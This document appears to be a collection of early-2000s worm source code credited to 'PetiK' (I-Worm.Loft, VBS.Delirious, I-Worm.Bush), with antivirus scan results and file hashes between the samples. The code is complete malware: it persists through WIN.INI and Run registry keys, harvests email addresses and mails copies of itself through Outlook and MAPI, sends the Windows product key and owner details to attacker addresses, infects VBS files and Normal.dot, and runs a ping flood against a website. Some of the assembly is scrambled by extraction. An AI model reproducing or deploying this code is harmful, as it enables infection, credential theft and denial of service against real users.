Email-Worm.Win32.Petik Email-Worm.Win32.Petik.i VBS/Chism VBS/Chism Worm.Petik.I Virus:VBS/Chism VBS/Chism VBS/Chism.A@mm VBS.Petik.I@mm VBS/Petik.I VBS.Seven.A VBS.Petik.i VBS/Seven-A VBS.Pet_Tick.gen VBS_PETIK.I-O Email-Worm.Win32.Petik.i VBS.Seven.A

Additional information File size: 3626 bytes MD5...: 8781b9a791c0c144e97a466486f6ef33 SHA1..: 6872bc5747eb4701e579305c68c517e712f680ec

comment # Name : I-Worm.Loft Author : PetiK Date : June 16th - June 22nd Size : 8704 byte Action : If the file is not \WINDOWS\SYSTEM\LOFT.EXE, it copies to this file and alters the run= line in the WIN.INI file to run in each start. It copies to \WINDOWS\LOFT_STORY.EXE too Otherwise, it checks if exists the key HKCU\Software\Microsoft\PetiK. If not exists, the worm creates the file "Loft.htm" in the StartUp folder. When the user will accept the ActiveX of this page, It modifies the start page of Internet Explorer to download the file ActiveX.vbs. This file send differents information about the computer to three addresses : loftptk@multimania(castaldi), petik@multimania.com(vlad14) and euphoria@ctw.net(pk29a). It displays a message all the 28th of the month and modifies the start page of internet and RegisteredOwner and RegisteredOrganization. It check if exist a internet connection. If not exist, it makes a loop all the five seconds or else it displays a message. It scans after all *.htm* file in the "Temporary Internet Files" to find email address. # .586p .model flat .code callx macro a extrn a:proc call a endm include useful.inc DEBUT: VERIF: push 00h callx GetModuleHandleA push 50 push offset szOrig push eax callx GetModuleFileNameA push 50h push offset szCopie callx GetSystemDirectoryA @pushsz "\LOFT.EXE" push offset szCopie callx lstrcat push 50h push offset szCopieb callx GetWindowsDirectoryA @pushsz "\LOFT_STORY.EXE" push offset szCopieb callx lstrcat push offset szOrig push offset szCopie callx lstrcmp test eax,eax jz C_PTK COPIE: push 00h push offset szCopie push offset szOrig callx CopyFileA push 00h push offset szCopieb push offset szOrig callx CopyFileA WININI: push 50 push offset szWinini callx GetWindowsDirectoryA @pushsz "\\WIN.INI" push offset szWinini callx lstrcat push offset szWinini

push offset szCopie @pushsz "run" @pushsz "windows" callx WritePrivateProfileStringA MESSAGE:push 1040h @pushsz "Loft Story" @pushsz "I'm fucking the Loft Story" push 00h callx MessageBoxA jmp FIN C_PTK: push offset regDisp push offset regResu push 00h push 0F003Fh push 00h push 00h push 00h @pushsz "Software\Microsoft\PetiK" push HKEY_CURRENT_USER callx RegCreateKeyExA cmp [regDisp],2 je DATE push [regResu] callx RegCloseKey STA_UP: push offset RegHandle push 001F0000h ; KEY_QUERY_VALUE push 00h @pushsz ".DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" push HKEY_USERS callx RegOpenKeyExA test eax,eax jnz FIN push offset BufferSize push offset Buffer push 00h ;ValueType push 00h @pushsz "Startup" push RegHandle callx RegQueryValueExA push [RegHandle] callx RegCloseKey CR_HTM: @pushsz "\Loft.htm" push offset Buffer call lstrcat push 00h push FILE_ATTRIBUTE_NORMAL push CREATE_ALWAYS push 00h push FILE_SHARE_READ push GENERIC_WRITE push offset Buffer callx CreateFileA mov [FileHandle],eax push 00h push offset octets push HTMTAILLE push offset htmd push [FileHandle] callx WriteFile push [FileHandle] callx CloseHandle jmp DLL DATE: push callx cmp jne SHSET: callx test jz mov offset SystemTime GetSystemTime [SystemTime.wDay],28 DLL @pushsz "SHLWAPI.dll" LoadLibraryA eax,eax DLL hdll2,eax

WEB:

@pushsz "SHSetValueA" push hdll2 callx GetProcAddress test eax,eax jz DLL mov setvalue,eax push 08h @pushsz "http://www.loftstory.fr" push 01h @pushsz "Start Page" @pushsz "Software\Microsoft\Internet Explorer\Main" push HKEY_CURRENT_USER call [setvalue] push 08h @pushsz "LoftStory" push 01h @pushsz "RegisteredOrganization" @pushsz "Software\Microsoft\Windows\CurrentVersion" push HKEY_LOCAL_MACHINE call [setvalue] push 08h @pushsz "Aziz, Kenza, Loanna, etc..." push 01h @pushsz "RegisteredOwner" @pushsz "Software\Microsoft\Windows\CurrentVersion" push HKEY_LOCAL_MACHINE call [setvalue] push [hdll2] callx FreeLibrary push 40h @pushsz "I-Worm.LoftStory" @pushsz "New Worm Internet coded by PetiK (c)2001" push 00h callx MessageBoxA

DLL:

@pushsz "WININET.dll" callx LoadLibraryA test eax,eax jz FIN mov hdll,eax @pushsz "InternetGetConnectedState" push hdll callx GetProcAddress test eax,eax jz FIN mov netcheck,eax jmp NET DODO: push 5000 callx Sleep NET: push 00h push offset Temp call [netcheck] dec eax jnz DODO NET_OK: push 40h @pushsz "Loft Story" @pushsz "Welcome to Internet !" push 00h callx MessageBoxA FINDLL: push [hdll] callx FreeLibrary REG: push offset RegHandle push 001F0000h ; KEY_QUERY_VALUE push 00h @pushsz ".DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" push HKEY_USERS callx RegOpenKeyExA test eax,eax jnz FIN push offset BufferSize push offset Buffer push 00h ;ValueType push 00h @pushsz "Cache" push RegHandle

callx RegQueryValueExA push [RegHandle] callx RegCloseKey TIF_CUR:push offset Buffer callx SetCurrentDirectoryA call FFF FIN: FFF: push 00h callx ExitProcess

push offset HTM @pushsz "*.htm*" callx FindFirstFileA mov edi,eax cmp eax,-1 je FIN P_HTM: call parse_html FNF: push offset HTM push edi callx FindNextFileA test eax,eax jnz P_HTM FC: push edi callx FindClose ret parse_html: pushad push 00h push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push 00h push FILE_SHARE_READ push GENERIC_READ push offset HTM.FileName callx CreateFileA inc eax je FIN dec eax xchg eax,ebx xor push push push push push push callx test je xchg xor push push push push push callx test je xchg push push callx xchg jecxz eax,eax eax eax eax PAGE_READONLY eax ebx CreateFileMappingA eax,eax ph_close eax,ebp eax,eax eax eax eax FILE_MAP_READ ebp MapViewOfFile eax,eax ph_close2 eax,esi 00h ebx GetFileSize eax,ecx ph_close3

;open the file

;create the file mapping

;map the file

;get its size

ls_scan_mail: call @mt db 'mailto:' @mt: pop edi l_scan_mail:

pushad push 7 pop ecx rep cmpsb popad je scan_mail inc esi loop l_scan_mail ph_close3: push callx ph_close2: push callx ph_close: push callx popad ret scan_mail: xor add mov push n_char: cmp je cmp je cmp je cmp jne inc o_a: stosb jmp s_char: jmp e_char: stosb pop test je call test jne call call jmp mapi_init: xor push push push push push push callx ret send: xor push push push push push callx ret close: push push esi UnmapViewOfFile ebp CloseHandle ebx CloseHandle

;search for "mailto:" ;string ;check the mail address ;in a loop

;unmap view of file ;close file mapping ;close the file

edx,edx esi,7 edi,offset mail_address edi lodsb al,' ' s_char al,'"' e_char al,'''' e_char al,'@' o_a edx n_char inc esi n_char xor al,al edi edx,edx ls_scan_mail mapi_init eax,eax ls_scan_mail send close ls_scan_mail eax,eax offset MAPIHandle eax eax eax eax eax MAPILogon eax,eax eax eax offset sMessage eax [MAPIHandle] MAPISendMail xor eax eax eax,eax

;where to store the ;mail address

;if EDX=0, mail is not ;valid (no '@')

push eax push 12345678h MAPIHandle = dword ptr $-4 callx MAPILogoff ret add_ad: ;@pushsz "C:\carnet.txt" ;push offset mail_address ;push offset mail_address ;@pushsz "Carnet d'adresses" ;callx WritePrivateProfileStringA ret .data htmd: db '<html><head><title>Loft Story WEB Page</title></head>',0dh,0ah db '<font face=''verdana'' color=green size=''2''>Please accept ActiveX ' db 'to see this page<br><br> Internet Explorer<br><br> </font>',0dh,0ah db '<SCRIPT Language=VBScript>',0dh,0ah db 'On Error Resume Next',0dh,0ah db 'Set w=CreateObject("WScript.Shell")',0dh,0ah db 'w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ActiveX 1.0",' db '"C:\ActiveX.vbs"',0dh,0ah db 'w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Download Directory",' db '"C:\"',0dh,0ah db 'document.write "Please download the file ""ActiveX.vbs"" to correct a bug ' db 'in Internet Explorer"',0dh,0ah db 'document.write "<br>Connect you to internet to download the file<br>"',0dh,0ah db 'document.write "<br><h2>If you don''t accept ActiveX the syntax failed<h2>"',0dh,0ah db 'w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",' db '"http://www.ctw.net/euphoria/ActiveX.vbs"',0dh,0ah db '</SCRIPT></body></html>',0dh,0ah HTMTAILLE equ $-htmd szCopie szCopieb szOrig szWinini Buffer BufferSize FileHandle RegHandle regDisp regResu octets hdll hdll2 netcheck setvalue mail_address Temp ValueType sMessage dd dd dd dd dd dd dd dd dd dd dd dd db db db db dd dd dd dd dd dd db db db db db dd dd dd dd dd dd dd dd dd dd db dd dd 50 dup (0) 50 dup (0) 50 dup (0) 50 dup (0) 7Fh dup (0) 7Fh ? ? 0 0 ? ? ? ? ? 128 dup (?) 0 0 subject body date mFrom mTo attach

? offset offset ? offset ? 2 offset 1 offset 1 offset

subject body date sender mFrom

"Loft Story News...",00h "The last video of the <Loft story> program",00h "07/01/2001",00h "b_castaldi@loftstory.fr",00h ? ? offset mFrom offset sender ? ?

mTo

dd dd dd dd dd dd dd dd dd dd dd dd

? 1 offset mTo offset mail_address ? ? ? ? ? offset szCopieb ? ? equ equ equ equ equ equ equ equ equ equ equ equ 00000002h 00000080h 00000002h 00000004h 00000001h 80000000h 40000000h 80000001h 80000002h 80000003h 00000003h 00000002h

attach

CREATE_ALWAYS FILE_ATTRIBUTE_NORMAL FILE_END FILE_MAP_READ FILE_SHARE_READ GENERIC_READ GENERIC_WRITE HKEY_CURRENT_USER HKEY_LOCAL_MACHINE HKEY_USERS OPEN_EXISTING PAGE_READONLY SYSTIME wYear wMonth wDayOfWeek wDay wHour wMinute wSecond wMillisecond SYSTIME SystemTime filetime LowDateTime HighDateTime filetime win32 Fileattributes CreationTime LastAccessTime LastWriteTime FileSizeHigh FileSizeHow Reserved0 Reserved1 FileName AlternativeName win32 HTM win32 <> end DEBUT end

struct WORD ? WORD ? WORD ? WORD ? WORD ? WORD ? WORD ? WORD ? ends SYSTIME <> struct dd ? dd ? ends struct dd ? filetime ? filetime ? filetime ? dd ? dd ? dd ? dd ? dd 260 (?) db 13 dup (?) db 3 dup (?) ends

ACTIVEX.VBS On Error Resume Next Set f=CreateObject("Scripting.FileSystemObject") Set w=CreateObject("WScript.Shell") Set ws=Wscript.CreateObject("WScript.Shell") startup=ws.SpecialFolders("Startup") If f.FileExists (startup&"\Loft.htm") Then f.DeleteFile (startup&"\Loft.htm") MsgBox "Patch for Internet Explorer installed",vbinformation,"Patch v1.0" MsgBox "You can delete this file",vbinformation,"Patch v1.0" End If CN=CreateObject("WScript.NetWork").ComputerName UN=CreateObject("WScript.NetWork").UserName UD=CreateObject("WScript.NetWork").UserDomain NOM=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner") ENT=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization") PI=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId") PK=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey") V=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Version") VN=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber") P=w.RegRead("HKCU\Software\Microsoft\Internet Explorer\International\AcceptLanguage") Set O=CreateObject("Outlook.Application") Set m=O.CreateItem(0) m.To = "loftptk@multimania.com" m.BCC = "petik@multimania.com; euphoria@ctw.net" m.Subject="Loft Info arrivant de " & P n = "Date : " & date n = n & VbCrLf & "Heure : " & time n = n & VbCrLf & "Nom d'enregistrement : " & NOM n = n & VbCrLf & "Nom de l'organization : " & ENT n = n & VbCrLf & "Numéro d'identification : " & PI n = n & VbCrLf & "Numéro d'enregistrement : " & PK n = n & VbCrLf & "Version de Windows : " & V & " " & VN n = n & VbCrLf & "Nom de l'ordinateur : " & CN n = n & VbCrLf & "Nom de domaine : " & UD n = n & VbCrLf & "Nom d'utilisateur : " & UN m.Body = n m.DeleteAfterSubmit=True m.Send w.RegWrite "HKCU\Software\Microsoft\PetiK\LoftInfo","OK" w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.yahoo.fr"

File Loft.exe received on 05.16.2009 17:51:42 (CET) Antivirus Version Last Update a-squared 4.0.0.101 2009.05.16 AhnLab-V3 5.0.0.2 2009.05.16 AntiVir 7.9.0.168 2009.05.15 Antiy-AVL 2.0.3.1 2009.05.15 Authentium 5.1.2.4 2009.05.16 Avast 4.8.1335.0 2009.05.15 AVG 8.5.0.336 2009.05.15 BitDefender 7.2 2009.05.16 CAT-QuickHeal 10.00 2009.05.15 ClamAV 0.94.1 2009.05.16 Comodo 1157 2009.05.08 DrWeb 5.0.0.12182 2009.05.16 eSafe 7.0.17.0 2009.05.14 eTrust-Vet 31.6.6508 2009.05.16 F-Prot 4.4.4.56 2009.05.16 F-Secure 8.0.14470.0 2009.05.15 Fortinet 3.117.0.0 2009.05.16 GData 19 2009.05.16 Ikarus T3.1.1.49.0 2009.05.16 K7AntiVirus 7.10.737 2009.05.16 Kaspersky 7.0.0.125 2009.05.16 McAfee 5616 2009.05.15 McAfee+Artemis 5616 2009.05.15 McAfee-GW-Edition 6.7.6 2009.05.15 Microsoft 1.4602 2009.05.16 NOD32 4080 2009.05.15 Norman 6.01.05 2009.05.16 nProtect 2009.1.8.0 2009.05.16 Panda 10.0.0.14 2009.05.16 PCTools 4.4.2.0 2009.05.16 Prevx 3.0 2009.05.16 Rising 21.29.52.00 2009.05.16 Sophos 4.41.0 2009.05.16 Sunbelt 3.2.1858.2 2009.05.16 Symantec 1.4.4.12 2009.05.16 TheHacker 6.3.4.1.326 2009.05.15 TrendMicro 8.950.0.1092 2009.05.15 VBA32 3.12.10.5 2009.05.16 ViRobot 2009.5.15.1737 2009.05.15 VirusBuster 4.6.5.0 2009.05.16 Additional information File size: 8704 bytes MD5...: ee8e03e0a5251a340fe2c08fd7f9c2e4 SHA1..: 4144791ec8571744fe9905309bb6bf7199485a37

Result Email-Worm.Win32.Petik!IK Win32/PetTick.8704.B Worm/Petik.14 Worm/Win32.Win32 W32/Malware!cec4 Win32:Petik-LoftStory I-Worm/Petik.F Win32.Ltof.A@mm W32.Petik.K Worm.Win32.Petik.K Win32.Petik.8704 Win32/Petik.8704.B W32/Malware!cec4 Email-Worm.Win32.Petik VBS/Petik.E Win32.Ltof.A@mm Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM W32/PetTick@MM Worm.Petik.14 Worm:Win32/PetTick@mm Win32/Petik.K W32/Pet_Tick.8704.B Worm/W32.Petik.8704 W32/Petik.K HTML.Loft.A Medium Risk Malware Worm.Mail.Petik.i W32/Petik-K BehavesLike.Win32.Malware (v) W95.Pet_Tick.gen W32/PetTick@MM Win32.Worm.Petik.8192 I-Worm.Win32.PetTick.8704.B HTML.Loft.A

' ' ' ' ' ' ' ' ' ' '

Name : VBS.Delirious Author : PetiK Language : VBS Date : 28/06/2001 Copy itself to %WINDIR%\Delirious.vbs Run in each start by writing new value in HKLM\Software\Microsoft\Windows\CurrentVersion\Run Display a fake message if it's not Delirious.vbs Infect all VBS files Infect Normal.dot Spread with Outlook

On Error Resume Next Set sf=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") Set fl=sf.OpenTextFile(WScript.ScriptFullName,1) virus=fl.ReadAll Set win=sf.GetSpecialFolder(0) Set sys=sf.GetSpecialFolder(1) Set cpy=sf.GetFile(WScript.ScriptFullName) cpy.Copy(win&"\Delirious.vbs") r=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Delire") ws.RegWrite r,(win&"\Delirious.vbs") If cpy <> (win&"\Delirious.vbs") Then MsgBox cpy&" is not a VBS file valid.",vbcritical,cpy else Disque() Word() Spread() If Day(Now)=1 Then MsgBox "Look at my new virus !"+VbCrLf+"Delirious, isn't it ??",vbinformation,"VBS.Delirious coded by PetiK (c)2001" End If bureau=ws.SpecialFolders("Desktop") Set link=ws.CreateShortCut(bureau&"\Site_Web.url") link.TargetPath="http://www.jememarre.com" link.Save End If Sub Disque If not sf.FileExists (sys&"\DeliriousFile.txt") Then Set DF=sf.CreateTextFile(sys&"\DeliriousFile.txt") DF.WriteLine "Infected file by VBS.Delirious" DF.WriteLine "Fichiers infectés par VBS.Delirious :" DF.WriteBlankLines(1) DF.Close End If Set dr=sf.Drives For Each d in dr If d.DriveType=2 or d.DriveType=3 Then liste(d.path&"\") End If Next End Sub Sub infection(dossier) Set f=sf.GetFolder(dossier) Set fc=f.Files For Each F in fc ext=sf.GetExtensionName(F.path) ext=lcase(ext) If (ext="vbs") Then Set verif=sf.OpenTextFile(F.path, 1, False) If verif.ReadLine <> "'VBS.Delirious" Then tout=verif.ReadAll() verif.Close Set inf=sf.OpenTextFile(F.path, 2, True) inf.Write(virus) inf.Write(tout) inf.Close Set DF=sf.OpenTextFile(sys&"\DeliriousFile.txt", 8, True) DF.WriteLine F.path DF.Close

End If End If Next End Sub Sub liste(dossier) Set f=sf.GetFolder(dossier) Set sd=f.SubFolders For Each F in sd infection(F.path) liste(F.path) Next End Sub Sub Word() On Error Resume Next Set CODE=sf.CreateTextFile(sys&"\DeliriousCode.txt") CODE.Write(virus) CODE.Close If ws.RegRead("HKLM\Software\Microsoft\Delirious\InfectNormal") <> "OK" Then Set wrd=WScript.CreateObject("Word.Application") wrd.Visible=False Set NorT=wrd.NormalTemplate.VBProject.VBComponents NorT.Import sys&"\DeliriousCode.txt" wrd.Run "Normal.ThisDocument.AutoExec" wrd.Quit ws.RegWrite "HKLM\Software\Microsoft\Delirious\InfectNormal","OK" End If End Sub Sub Spread() WHO=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner") Set OA=CreateObject("Outlook.Application") Set MA=OA.GetNameSpace("MAPI") For Each C In MA.AddressLists If C.AddressEntries.Count <> 0 Then For D=1 To C.AddressEntries.Count Set AD=C.AddressEntries(D) Set EM=OA.CreateItem(0) EM.To=AD.Address EM.Subject="Delirious EMail from " & WHO body="Hi " & AD.Name & "," body = body & VbCrLf & "Look at this funny attached." body = body & VbCrLf & "" body = body & VbCrLf & " Best Regards " & WHO EM.Body=body EM.Attachments.Add(win&"\Delirious.vbs") EM.DeleteAfterSubmit=True If EM.To <> "" Then EM.Send End If Next End If Next End Sub

File Delirious.vbs received on 05.16.2009 11:30:16 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 Result Email-Worm.Win32.Petik!IK VBS/Petik Worm/Petik.AV.01 Worm/Win32.Win32 VBS/Petik.A@mm VBS:MailWorm-gen I-Worm/Petik Generic.ScriptWorm.FCCA075D VBS.Petik.H Worm.Win32.Email-Worm.Petik VBS.Petik VBS.MailSender. VBS/VBSWG!generic VBS/Petik.A@mm Email-Worm.Win32.Petik VBS/Petik.H@mm Generic.ScriptWorm.FCCA075D Email-Worm.Win32.Petik Email-Worm.Win32.Petik VBS/Louse@MM VBS/Louse@MM Worm.Petik.AV.01 Virus:VBS/Louse@mm.gen probably unknown SCRIPT VBS/Louse.A@mm VBS.Petik.L@mm VBS/Petik.H VBS.Petik.H Worm.Hopalong VBS/Petik-H VBS.Pet_Tick.C@m VBS_PETIK.H Email-Worm.Win32.Petik VBS.Petik.H

Additional information File size: 3112 bytes MD5...: 6e8ba64159c0520ecd7781951dd11fca SHA1..: 3a176e6646fd14f44074dd9d59122278bafe608c SHA256: bd2901cb43b873fb0ba5573641a56d24c066069302c7e275555665b12c86a2d8

comment # Name : I-Worm.Bush Author : PetiK Date : July 1st Size : 8192 byte Action : If the file is not \WINDOWS\SYSTEM\BIOS.EXE, it copies to this file and alters the run= line in the WIN.INI file to run in each start. It copies to \WINDOWS\Bush.exe too Otherwise, it creates \WINDOWS\Carnet.vbs and executed it. It adds a value in Reun key to run this file in each start. If the file exists, it makes nothing. After, it checks if the user is connected. If it finds a connection, it displays a message and send a copy of him to the addresses found with the VBS file. At the end, it attacks the site of G.W.Bush on the Wednesday. To compil : tasm32 /M /ML Bush tlink32 -Tpe -aa -x Bush,,,import32 C:\TASM32\BIN\brc32 bush.rc # .586p .model flat .code callx macro a extrn a:proc call a endm include useful.inc SIGNATURE db "I-Worm.Bush " db "by PetiK (c) 2001",00h

DEBUT: VERIF: push 00h callx GetModuleHandleA push 50 push offset szOrig push eax callx GetModuleFileNameA push 50h push offset szCopie callx GetSystemDirectoryA @pushsz "\BIOS.EXE" push offset szCopie callx lstrcat push 50h push offset szCopieb callx GetWindowsDirectoryA @pushsz "\Bush.exe" push offset szCopieb callx lstrcat push offset szOrig push offset szCopie callx lstrcmp test eax,eax jz CAR_A COPIE: push push callx push push push callx push 00h offset szCopie offset szOrig CopyFileA 00h offset szCopieb offset szOrig CopyFileA

WININI: push 50 push offset szWinini callx GetWindowsDirectoryA @pushsz "\\WIN.INI" push offset szWinini callx lstrcat

push offset szWinini push offset szCopie @pushsz "run" @pushsz "windows" callx WritePrivateProfileStringA MESSAGE:push 30h @pushsz "Error Load Library" @pushsz "Cannot run the Dynamic Link Library GWBios.dll" push 00h callx MessageBoxA jmp FIN CAR_A: push 50 push offset szCarnet callx GetWindowsDirectoryA @pushsz "\Carnet.vbs" push offset szCarnet callx lstrcat push 00h push FILE_ATTRIBUTE_NORMAL push CREATE_NEW push 00h push FILE_SHARE_READ push GENERIC_WRITE push offset szCarnet callx CreateFileA cmp eax,-1 je DLL mov [FH],eax push 00h push offset octets push VBSTAILLE push offset vbsd push [FH] callx WriteFile push [FH] callx CloseHandle REG: @pushsz "SHLWAPI.dll" callx LoadLibraryA test eax,eax jz DLL mov hdll,eax @pushsz "SHSetValueA" push hdll callx GetProcAddress test eax,eax jz DLL mov setvalue,eax RUN_C: push 08h push offset szCarnet push 01h @pushsz "Carnet d'adresses" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h call setvalue push [hdll] callx FreeLibrary DLL: @pushsz "WININET.dll" callx LoadLibraryA test eax,eax jz FIN mov hdll,eax @pushsz "InternetGetConnectedState" push hdll callx GetProcAddress test eax,eax jz FIN mov netcheck,eax jmp NET DODO: push 10000 callx Sleep NET: push 00h push offset Temp call [netcheck] dec eax

jnz

DODO

NET_OK: push 40h @pushsz "G.W.Bush" @pushsz "The man who want to kill poeple and the earth" push 00h callx MessageBoxA FINDLL: push [hdll] callx FreeLibrary JOUR: push callx cmp jne DoS: offset SystemTime GetSystemTime [SystemTime.wDayOfWeek],03h JOUR2

push 01h @pushsz "ping -l 10000 -t www.georgewbush.com" callx WinExec push 40h @pushsz "Internet" @pushsz "You can go to the web site : www.georgewbush.com" push 00h callx MessageBoxA

JOUR2: push offset SystemTime callx GetSystemTime cmp [SystemTime.wDay],25 jne TXT push 40h @pushsz "I-Worm.Bush" @pushsz "Coded by PetiK (c)2001. To show my anger against this man." push 00h callx MessageBoxA TXT: pushad push 50 push offset szCarnet2 callx GetWindowsDirectoryA @pushsz "\Carnet.txt" push offset szCarnet2 callx lstrcat push 00h push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push 00h push FILE_SHARE_READ push GENERIC_READ push offset szCarnet2 callx CreateFileA cmp eax,-1 je RETOUR xchg eax,ebx xor push push push push push push callx test je xchg xor push push push push push callx test je xchg push push eax,eax eax eax eax PAGE_READONLY eax ebx CreateFileMappingA eax,eax CL1 eax,ebp eax,eax eax eax eax FILE_MAP_READ ebp MapViewOfFile eax,eax CL2 eax,esi 00h ebx

callx GetFileSize xchg eax,ecx jecxz CL3 d_scan_mail: call @mlt db 'mailto:' @mlt: pop edi scn_mail: pushad push 07h pop ecx rep cmpsb popad je scan_mail inc esi loop scn_mail CL3: push esi callx UnmapViewOfFile CL2: push ebp callx CloseHandle CL1: push ebx callx CloseHandle RETOUR: popad FIN: push 00h callx ExitProcess edx,edx esi,7 ;size of the string MAILTO: edi,offset m_addr edi lodsb al,' ' car_s al,'"' car_f al,'@' not_a edx stosb p_car inc esi p_car xor al,al edi edx,edx d_scan_mail send d_scan_mail eax,eax eax eax offset sMessage eax [MAPIh] MAPISendMail ;if edx=0 no @

scan_mail: xor add mov push p_car: cmp je cmp je cmp jne inc not_a: jmp car_s: jmp car_f: stosb pop test je call jmp send: xor push push push push push callx ret .data szCarnet szCarnet2 szCopie szCopieb szOrig szWinini FH octets hdll netcheck setvalue shfolder m_addr Temp

db db db db db db dd dd dd dd dd dd

50 50 50 50 50 50 ? ? ? ? ? ?

dup dup dup dup dup dup

(0) (0) (0) (0) (0) (0)

db 128 dup (?) dd 0

MAPIh sMessage

dd 0 dd dd dd dd dd dd dd dd dd dd dd dd db db db db db dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd ? offset offset ? offset ? 2 offset 1 offset 1 offset subject body date mFrom mTo attach

subject body

date sender mFrom

db "Important and confidential information about...",00h "...the powerfulest man of the world.",0dh,0ah "Look at this attachment to better know this man.",0dh,0ah,0dh,0ah "Visit his site (www.georgewbush.com) on Wednesday.",0dh,0ah,0dh,0ah 09h,"Best Regards",00h "07/01/2001",00h db "webmaster@rnc.org",00h ? ? offset mFrom offset sender ? ? ? 1 offset mTo offset m_addr ? ? dd ? ? ? offset szCopieb ? ?

mTo

attach

vbsd: db 'On Error Resume Next',0dh,0ah db 'Set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'Set w=CreateObject("WScript.Shell")',0dh,0ah db 'If not f.FileExists (f.GetSpecialFolder(0)&"\Carnet.txt") Then',0dh,0ah db 'Set cr=f.CreateTextFile(f.GetSpecialFolder(0)&"\Carnet.txt")',0dh,0ah db 'cr.Close',0dh,0ah db 'End If',0dh,0ah db 'Set OA=CreateObject("Outlook.Application")',0dh,0ah db 'Set MA=OA.GetNameSpace("MAPI")',0dh,0ah db 'For each A In MA.AddressLists',0dh,0ah db 'If A.Addressentries.Count <> 0 Then',0dh,0ah db 'For B=1 To A.AddressEntries.Count',0dh,0ah db 'Set C=A.AddressEntries(B)',0dh,0ah db 'If w.RegRead ("HKCU\Software\Bush\" & C.Address) <> "OK" Then',0dh,0ah db 'Set car=f.OpenTextFile(f.GetSpecialFolder(0)&"\Carnet.txt", 8, True)',0dh,0ah db 'car.WriteLine """mailto:" & C.Address & """"',0dh,0ah db 'car.Close',0dh,0ah db 'w.RegWrite "HKCU\Software\Bush\" & C.Address,"OK"',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah VBSTAILLE equ $-vbsd CREATE_NEW FILE_ATTRIBUTE_NORMAL FILE_MAP_READ FILE_SHARE_READ GENERIC_READ GENERIC_WRITE OPEN_EXISTING PAGE_READONLY equ equ equ equ equ equ equ equ 00000001h 00000080h 00000004h 00000001h 80000000h 40000000h 00000003h 00000002h

SYSTIME struct wYear WORD wMonth WORD wDayOfWeek WORD wDay WORD wHour WORD wMinute WORD wSecond WORD wMillisecond WORD SYSTIME ends SystemTime SYSTIME <> end DEBUT end

? ? ? ? ? ? ? ?

File Bush.exe received on 05.16.2009 11:20:57 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 